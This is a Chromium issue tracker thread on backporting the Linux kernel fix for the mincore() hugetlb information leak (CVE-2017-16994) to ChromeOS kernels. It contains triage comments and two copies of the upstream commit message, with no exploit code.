Issue metadata
Sign in to add a comment
|
Security: Information Leak in mincore() |
||||||||||||||||||||||
Issue descriptionPer https://bugs.chromium.org/p/project-zero/issues/detail?id=1431 Fix is at https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41288fb1e54990b7c Guenter, can you take a look?
,
Nov 29 2017
Affects Lakitu. Not enabled in Chromeos images. Already fixed in chromeos-4.14. Will only apply to chromeos-4.4.
,
Nov 29 2017
Guenter, this has a medium severity. Do you plan to backport the fix to 63 as well?
,
Nov 29 2017
Sorry I just saw the M-63 label after my last post... I am asking because we are freezing 63 this week. The assigned CVE, CVE-2017-16994, is given a score of 3 by RedHat, https://access.redhat.com/security/cve/cve-2017-16994. I am not sure if it's worth holding our freeze for the fix.
,
Nov 29 2017
,
Nov 29 2017
#3/#4: Your images, your call. Let me know.
,
Nov 29 2017
GKE doesn't really support hugepages, but it looks like the exploit works even when there are no hugepages allocated. The patch doesn't look very intrusive and we plan to make a m63-stable release this week. It would ideal to get it into m63-stable if we can. Our next release will only be in January (after production freeze).
,
Nov 29 2017
,
Nov 30 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromiumos/third_party/kernel/+/6681fbe05e99608e74cc6d4a10327c250ce0c02d commit 6681fbe05e99608e74cc6d4a10327c250ce0c02d Author: Jann Horn <jannh@google.com> Date: Thu Nov 30 02:04:58 2017 UPSTREAM: mm/pagewalk.c: report holes in hugetlb ranges commit 373c4557d2aa362702c4c2d41288fb1e54990b7c upstream. This matters at least for the mincore syscall, which will otherwise copy uninitialized memory from the page allocator to userspace. It is probably also a correctness error for /proc/$pid/pagemap, but I haven't tested that. Removing the `walk->hugetlb_entry` condition in walk_hugetlb_range() has no effect because the caller already checks for that. This only reports holes in hugetlb ranges to callers who have specified a hugetlb_entry callback. This issue was found using an AFL-based fuzzer. v2: - don't crash on ->pte_hole==NULL (Andrew Morton) - add Cc stable (Andrew Morton) Changed for 4.4/4.9 stable backport: - fix up conflict in the huge_pte_offset() call BUG= chromium:789497 TEST=Build and run Change-Id: I80dfb0d9681f16b020740a842b5bcfbe00f8952c Fixes: 1e25a271c8ac ("mincore: apply page table walker on do_mincore()") Signed-off-by: Jann Horn <jannh@google.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> Signed-off-by: Guenter Roeck <groeck@chromium.org> (cherry picked from commit a3805b10de80) Reviewed-on: https://chromium-review.googlesource.com/796915 Reviewed-by: Daniel Wang <wonderfly@google.com> Reviewed-by: Dylan Reid <dgreid@chromium.org> [modify] https://crrev.com/6681fbe05e99608e74cc6d4a10327c250ce0c02d/mm/pagewalk.c
,
Nov 30 2017
Merge request is for chromeos-4.4 only.
,
Nov 30 2017
This bug requires manual review: We are only 4 days from stable. Please contact the milestone owner if you have questions. Owners: cmasso@(Android), cmasso@(iOS), gkihumba@(ChromeOS), govind@(Desktop) For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Nov 30 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromiumos/third_party/kernel/+/eecf1b79631742d2969abeafac85151a3b5f3759 commit eecf1b79631742d2969abeafac85151a3b5f3759 Author: Jann Horn <jannh@google.com> Date: Thu Nov 30 04:54:57 2017 UPSTREAM: mm/pagewalk.c: report holes in hugetlb ranges commit 373c4557d2aa362702c4c2d41288fb1e54990b7c upstream. This matters at least for the mincore syscall, which will otherwise copy uninitialized memory from the page allocator to userspace. It is probably also a correctness error for /proc/$pid/pagemap, but I haven't tested that. Removing the `walk->hugetlb_entry` condition in walk_hugetlb_range() has no effect because the caller already checks for that. This only reports holes in hugetlb ranges to callers who have specified a hugetlb_entry callback. This issue was found using an AFL-based fuzzer. v2: - don't crash on ->pte_hole==NULL (Andrew Morton) - add Cc stable (Andrew Morton) Changed for 4.4/4.9 stable backport: - fix up conflict in the huge_pte_offset() call BUG= chromium:789497 TEST=Build and run Change-Id: I80dfb0d9681f16b020740a842b5bcfbe00f8952c Fixes: 1e25a271c8ac ("mincore: apply page table walker on do_mincore()") Signed-off-by: Jann Horn <jannh@google.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> Signed-off-by: Guenter Roeck <groeck@chromium.org> (cherry picked from commit a3805b10de80) Reviewed-on: https://chromium-review.googlesource.com/798471 Commit-Queue: Daniel Wang <wonderfly@google.com> Tested-by: Daniel Wang <wonderfly@google.com> [modify] https://crrev.com/eecf1b79631742d2969abeafac85151a3b5f3759/mm/pagewalk.c
,
Nov 30 2017
,
Nov 30 2017
,
Dec 1 2017
,
Dec 8 2017
Issue 793258 has been merged into this issue.
,
Mar 8 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Mar 27 2018
|
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by sheriffbot@chromium.org
, Nov 29 2017